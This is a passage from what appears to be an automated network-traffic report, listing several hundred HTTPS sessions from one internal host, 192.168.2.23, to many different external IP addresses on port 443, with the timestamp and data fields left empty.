                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14203192.168.2.2349574108.24.179.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14204192.168.2.2334982196.241.15.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14205192.168.2.2343150149.133.210.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14206192.168.2.236017452.253.79.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14207192.168.2.235981623.157.249.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14208192.168.2.2352868223.217.69.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14209192.168.2.2358030115.208.40.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14210192.168.2.2345872194.25.26.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14211192.168.2.235844462.58.21.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14212192.168.2.2344530150.188.0.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14213192.168.2.2333710207.77.213.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14214192.168.2.2360980119.18.19.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14215192.168.2.235633886.64.33.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14216192.168.2.2348632219.153.148.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14217192.168.2.2340026115.65.230.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14218192.168.2.2351026129.96.91.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14219192.168.2.234682894.73.102.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14220192.168.2.234348686.31.135.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14221192.168.2.234535898.108.68.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14222192.168.2.233281670.89.188.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14223192.168.2.2348342171.223.120.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14224192.168.2.234607469.109.96.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14225192.168.2.233386450.117.238.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14226192.168.2.2339424182.165.167.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14227192.168.2.233869852.221.158.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14228192.168.2.2352280119.66.33.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14229192.168.2.235121085.72.5.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14230192.168.2.2345744124.238.59.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14231192.168.2.234591273.100.159.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14232192.168.2.2338712106.49.204.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14233192.168.2.23365384.148.137.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14234192.168.2.2348822189.139.68.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14235192.168.2.2342432209.167.103.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14236192.168.2.23358145.231.31.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14237192.168.2.235000689.195.117.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14238192.168.2.2350784198.125.124.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14239192.168.2.233832623.64.114.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14240192.168.2.235932274.11.80.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14241192.168.2.2359880184.110.48.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14242192.168.2.2358794112.141.214.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14243192.168.2.2359468126.241.55.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14244192.168.2.2357470172.91.245.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14245192.168.2.2360230140.87.187.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14246192.168.2.236060827.53.33.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14247192.168.2.2349082128.85.246.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14248192.168.2.2355336174.250.235.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14249192.168.2.2350516133.176.241.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14250192.168.2.2353892201.52.64.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14251192.168.2.233450639.48.48.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14252192.168.2.234153444.191.176.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14253192.168.2.2333196132.144.0.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14254192.168.2.2354132203.156.92.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14255192.168.2.2335738113.81.204.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14256192.168.2.2343126119.205.50.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14257192.168.2.2332952120.139.110.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14258192.168.2.235850243.52.62.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14259192.168.2.2336756134.26.119.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14260192.168.2.233967091.187.35.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14261192.168.2.2334170203.242.59.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14262192.168.2.235431065.101.72.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14263192.168.2.233585081.157.73.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14264192.168.2.2335724177.138.9.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14265192.168.2.2340532155.47.231.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14266192.168.2.2355482102.233.45.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14267192.168.2.2334410219.157.54.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14268192.168.2.2358940174.7.9.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14269192.168.2.2351978182.62.10.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14270192.168.2.2337092163.44.245.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14271192.168.2.2343764205.109.39.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14272192.168.2.2339574200.112.0.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14273192.168.2.2341858156.251.255.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14274192.168.2.234521418.17.162.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14275192.168.2.234211420.158.187.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14276192.168.2.2344560164.35.17.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14277192.168.2.233841494.131.240.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14278192.168.2.233601853.225.151.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14279192.168.2.235081659.34.73.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14280192.168.2.233975645.147.68.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14281192.168.2.2349040140.202.27.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14282192.168.2.2333192119.153.59.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14283192.168.2.2356030171.133.154.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14284192.168.2.234408436.175.41.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14285192.168.2.234202236.235.64.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14286192.168.2.2343970123.188.99.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14287192.168.2.2356352207.227.173.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14288192.168.2.234603214.22.170.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14289192.168.2.2350602147.242.200.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14290192.168.2.2355542213.176.74.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14291192.168.2.2340472158.156.158.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14292192.168.2.2350584209.67.79.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14293192.168.2.2351986194.209.20.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14294192.168.2.2336748136.125.237.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14295192.168.2.234006437.9.33.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14296192.168.2.233433458.221.168.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14297192.168.2.2349894161.198.13.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14298192.168.2.234931043.76.251.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14299192.168.2.234795460.86.159.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14300192.168.2.2345474216.183.60.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14301192.168.2.233756044.71.125.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14302192.168.2.233665042.137.237.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14303192.168.2.2347494157.165.157.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14304192.168.2.2344060142.17.151.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14305192.168.2.2342426169.95.114.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14306192.168.2.234966625.219.248.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14307192.168.2.2356832190.34.154.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14308192.168.2.233686283.33.183.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14309192.168.2.233401480.107.202.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14310192.168.2.234629877.184.208.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14311192.168.2.2343270101.214.48.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14312192.168.2.2341492200.201.182.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14313192.168.2.2351096198.152.167.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14314192.168.2.2358366128.57.234.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14315192.168.2.235932272.186.40.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14316192.168.2.236014018.17.182.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14317192.168.2.2344306108.147.197.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14318192.168.2.2354498100.54.95.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14319192.168.2.2356272132.253.131.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14320192.168.2.233903212.255.146.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14321192.168.2.2357200154.26.90.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14322192.168.2.236013485.156.103.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14323192.168.2.2341748101.215.214.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14324192.168.2.2357890107.133.163.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14325192.168.2.2347756145.86.86.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14326192.168.2.23345542.18.184.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14327192.168.2.235259297.71.97.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14328192.168.2.234145868.220.103.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14329192.168.2.235669872.116.254.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14330192.168.2.2344450198.111.92.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14331192.168.2.2339354182.182.20.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14332192.168.2.2337288209.27.186.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14333192.168.2.2352000179.179.193.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14334192.168.2.2345462179.46.138.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14335192.168.2.2334230154.143.137.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14336192.168.2.2357652204.35.130.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14337192.168.2.2353960126.169.1.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14338192.168.2.2357910122.165.41.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14339192.168.2.234292661.169.213.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14340192.168.2.2334152147.148.40.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14341192.168.2.233910659.130.214.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14342192.168.2.2354688115.72.114.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14343192.168.2.2359152177.181.214.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14344192.168.2.2340980207.182.202.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14345192.168.2.2340352187.217.237.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14346192.168.2.23377764.124.193.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14347192.168.2.2358882179.135.195.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14348192.168.2.235711877.4.254.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14349192.168.2.233936076.94.6.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14350192.168.2.2338004203.226.127.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14351192.168.2.234903653.20.79.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14352192.168.2.235652893.59.215.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14353192.168.2.2352850179.205.111.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14354192.168.2.2342594145.218.163.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14355192.168.2.2359228164.242.42.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14356192.168.2.2350142222.237.123.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14357192.168.2.2360226205.129.234.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14358192.168.2.2345550170.213.236.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14359192.168.2.234492489.107.177.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14360192.168.2.2341224111.188.14.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14361192.168.2.2334752169.246.44.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14362192.168.2.2347674135.176.43.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14363192.168.2.233870869.60.129.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14364192.168.2.234976294.196.110.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14365192.168.2.2344136109.112.175.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14366192.168.2.2344504223.233.115.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14367192.168.2.233860034.159.181.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14368192.168.2.2348632142.248.158.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14369192.168.2.234243250.165.207.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14370192.168.2.234108474.252.134.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14371192.168.2.2351440221.58.109.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14372192.168.2.233825464.58.245.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14373192.168.2.2350538115.48.100.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14374192.168.2.236033239.146.105.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14375192.168.2.2333630172.245.155.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14376192.168.2.2350624174.102.11.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14377192.168.2.233785876.156.40.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14378192.168.2.2334190212.211.132.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14379192.168.2.2339956192.30.98.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14380192.168.2.2343976149.226.13.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14381192.168.2.2344990148.78.8.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14382192.168.2.2351686125.245.221.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14383192.168.2.2335144100.23.213.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14384192.168.2.233312475.128.31.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14385192.168.2.234608845.67.3.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14386192.168.2.234055827.205.164.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14387192.168.2.2344188125.163.112.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14388192.168.2.233854620.158.27.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14389192.168.2.2347416105.21.149.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14390192.168.2.2356060142.166.47.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14391192.168.2.2357250132.165.234.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14392192.168.2.2352468110.164.200.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14393192.168.2.2346506109.27.221.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14394192.168.2.2354536207.15.174.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14395192.168.2.234471434.45.4.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14396192.168.2.2357360202.22.23.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14397192.168.2.234357883.40.194.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14398192.168.2.2338748167.125.89.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14399192.168.2.2341396206.99.220.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14400192.168.2.2346926213.130.118.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14401192.168.2.235260870.171.202.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14402192.168.2.2335782220.139.25.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14403192.168.2.2337426130.227.230.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14404192.168.2.234628064.94.80.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14405192.168.2.234037432.155.103.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14406192.168.2.2351678122.88.158.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14407192.168.2.2337050129.7.93.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14408192.168.2.235236461.51.182.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14409192.168.2.2347250202.20.227.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14410192.168.2.233612619.5.20.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14411192.168.2.2345384105.16.72.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14412192.168.2.2347196207.146.125.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14413192.168.2.233846465.13.204.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14414192.168.2.2356886165.106.173.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14415192.168.2.2345898141.187.103.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14416192.168.2.2334096184.183.92.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14417192.168.2.233964648.1.194.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14418192.168.2.2360430155.131.212.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14419192.168.2.2343758120.26.174.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14420192.168.2.2348796131.223.36.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14421192.168.2.235528051.106.84.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14422192.168.2.2354760204.65.164.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14423192.168.2.234540436.29.67.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14424192.168.2.233788270.101.248.183443
